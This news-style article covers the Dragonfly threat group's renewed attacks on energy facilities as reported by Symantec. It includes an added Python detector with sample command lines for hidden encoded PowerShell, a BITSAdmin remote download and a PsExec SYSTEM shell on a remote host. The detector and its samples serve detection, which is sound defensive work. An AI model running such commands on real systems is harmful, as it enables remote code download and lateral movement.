A group of cybercriminals is targeting energy facilities in Europe and North America as part of a fresh wave of cybersecurity attacks that could lead to the disruption or sabotage of operational systems.
Though the group — called “Dragonfly” — has been at work since 2011, it became quiet after its operations were exposed by researchers in 2014. However, a new report by security specialist Symantec suggested the group has been active again since 2015 and has increased its operations through 2017.
The report presented more evidence of the threat facing executives who run critical infrastructure, such as energy facilities. IT managers in these organizations should take note of the risks highlighted by Symantec and look to reduce the threat through security best practices.
What Is Dragonfly?
According to SecurityWeek, the Dragonfly group is also known as Energetic Bear, Crouching Yeti and Iron Liberty. During its two-year lull, the group did not stop operations and instead worked to update its activities, according to Bleeping Computer.
In a blog post detailing its new analysis, Symantec suggested the group now aims to sabotage or gain control of operational systems in energy facilities. The researchers noted a distinct increase in activity through 2017 and suggested Dragonfly launched attacks in the U.S., Turkey and Switzerland. Symantec also detected signs of action outside these nations.
Dissecting Dragonfly’s Techniques
The first activity of the renewed campaign, referred to as “Dragonfly 2.0,” came in the form of a malicious email campaign against the energy sector through December 2015. According to Symantec, Dragonfly 2.0 relies on a range of other attack vectors, including watering hole attacks used to harvest network credentials and Trojanized software.
The attackers often use widely available malware via administration tools such as PowerShell, PsExec and BITSAdmin. Symantec suggested this use of standard malware might be part of a strategy to mask the group’s identity. The attackers typically install backdoors onto a victim’s computer to provide remote access to systems.
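Because PowerShell, PsExec and BITSAdmin are legitimate administration utilities, spotting their abuse comes down to watching how they are invoked rather than whether they run at all. The following is an added example, not code from Symantec's report or from the article: it scans Windows process-creation events (a JSON shape modelled loosely on Sysmon Event ID 1 fields; the field names and all sample lines are constructed assumptions) and flags invocations of the three tools whose arguments are uncommon in routine administration, such as an encoded PowerShell command, a BITS download job pulling from a URL, or PsExec launching a SYSTEM shell on a remote host.

```python
"""Flag unusual invocations of PowerShell, PsExec and BITSAdmin in
Windows process-creation events.

Added example for this article. The event format (JSON with Sysmon-like
field names) and every sample line below are constructed for illustration;
nothing here is taken from Symantec's report or from a real incident.
"""
import json
import re
from typing import Dict, List, Tuple

# Each rule lists (compiled pattern, reason) pairs describing command-line
# features that administrators rarely use but intruders frequently do.
RULES: Dict[str, Tuple[str, List[Tuple[re.Pattern, str]]]] = {
    "powershell.exe": ("PowerShell", [
        (re.compile(r"(?i)-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}"),
         "base64-encoded command"),
        (re.compile(r"(?i)downloadstring|invoke-webrequest|\biwr\b"),
         "fetches content from a remote URL"),
        (re.compile(r"(?i)-w(indowstyle)?\s+hidden"),
         "hidden window"),
    ]),
    "bitsadmin.exe": ("BITSAdmin", [
        (re.compile(r"(?i)/transfer\b.*https?://"),
         "BITS download job from a URL"),
        (re.compile(r"(?i)/setnotifycmdline"),
         "runs a command when the job completes"),
    ]),
    "psexec.exe": ("PsExec", [
        (re.compile(r"\\\\\S+"), "targets a remote host"),
        (re.compile(r"(?i)\s-s\b"), "runs as SYSTEM"),
        (re.compile(r"(?i)\s-c\b"), "copies a program to the remote host"),
    ]),
}


def parse_event(line: str) -> Dict[str, str]:
    """Parse one JSON process-creation event into the fields the rules need."""
    event = json.loads(line)
    # Keep only the executable name so rules match regardless of install path.
    image = event.get("Image", "").rsplit("\\", 1)[-1].lower()
    return {
        "host": event.get("Computer", ""),
        "user": event.get("User", ""),
        "image": image,
        "cmdline": event.get("CommandLine", ""),
    }


def evaluate(event: Dict[str, str]) -> List[str]:
    """Return the reasons an event looks suspicious (empty list if none)."""
    rule = RULES.get(event["image"])
    if rule is None:
        return []
    _, patterns = rule
    return [reason for pattern, reason in patterns if pattern.search(event["cmdline"])]


def scan(lines) -> List[Dict[str, object]]:
    """Run every rule over a sequence of JSON event lines; collect findings."""
    findings = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        event = parse_event(line)
        reasons = evaluate(event)
        if reasons:
            tool, _ = RULES[event["image"]]
            findings.append({"host": event["host"], "user": event["user"],
                             "tool": tool, "cmdline": event["cmdline"],
                             "reasons": reasons})
    return findings


# Constructed sample events: three suspicious, two routine. The base64 blob
# is just the alphabet encoded; the hostnames and users are made up.
SAMPLE_EVENTS = r"""
{"Computer": "WS-ENG-07", "User": "CORP\\jdoe", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell.exe -NoP -W Hidden -Enc QUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVo="}
{"Computer": "WS-ENG-07", "User": "CORP\\jdoe", "Image": "C:\\Windows\\System32\\bitsadmin.exe", "CommandLine": "bitsadmin.exe /transfer upd /download /priority normal http://example.invalid/u.bin C:\\Users\\Public\\u.bin"}
{"Computer": "WS-ENG-07", "User": "CORP\\jdoe", "Image": "C:\\Tools\\psexec.exe", "CommandLine": "psexec.exe \\\\SRV-HMI-02 -s cmd.exe"}
{"Computer": "SRV-FILE-01", "User": "CORP\\svc_backup", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell.exe -File C:\\Scripts\\backup.ps1"}
{"Computer": "WS-ENG-07", "User": "CORP\\jdoe", "Image": "C:\\Windows\\System32\\notepad.exe", "CommandLine": "notepad.exe C:\\Users\\jdoe\\notes.txt"}
"""


if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS.splitlines()):
        print(f"{finding['host']} {finding['user']} {finding['tool']}: "
              f"{', '.join(finding['reasons'])}\n    {finding['cmdline']}")
```

Run against the constructed sample, the first three events are reported and the two routine ones (a scheduled backup script and Notepad) are not. The approach only works where command-line arguments are actually recorded, which means enabling command-line auditing for Windows event 4688 or deploying Sysmon; without that telemetry these tools are indistinguishable from ordinary administration.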
Researchers suggested the most concerning evidence centers on screen captures. Some of these captures included sensitive details such as the location of the infected machine and the name of the host organization. Many of these descriptions included the string “cntrl,” a potential indication that these machines have operational system access.
Symantec reported the amount of conflicting evidence about Dragonfly activities makes it difficult to state the origins of the group and the individuals involved. However, the firm referred to Dragonfly as a highly experienced threat actor with the capability to materially disrupt utility organizations. The long-term plans of the group remain uncertain.
Protecting the Energy Sector From Cybersecurity Attacks
An increasing number of experts recognize that energy and utilities organizations worldwide are a focus of cybersecurity attacks. The FBI and Department of Homeland Security issued a joint report earlier this year warning about the risk to nuclear power stations and other energy facilities, The New York Times reported.
Last month, the National Infrastructure Advisory Council (NIAC) published a draft report detailing the complex risks associated with critical infrastructure sectors. NIAC made 11 specific recommendations, including the establishment of specific network paths and reserved spectrum for backup communications during emergencies.
News of this ever-increasing threat represents a significant warning signal to executives running utility facilities and other elements of critical infrastructure. The Symantec researchers ended their report with several security recommendations, such as using strong passwords, implementing multiple protection systems and establishing an enforceable security policy with an emphasis on employee education programs.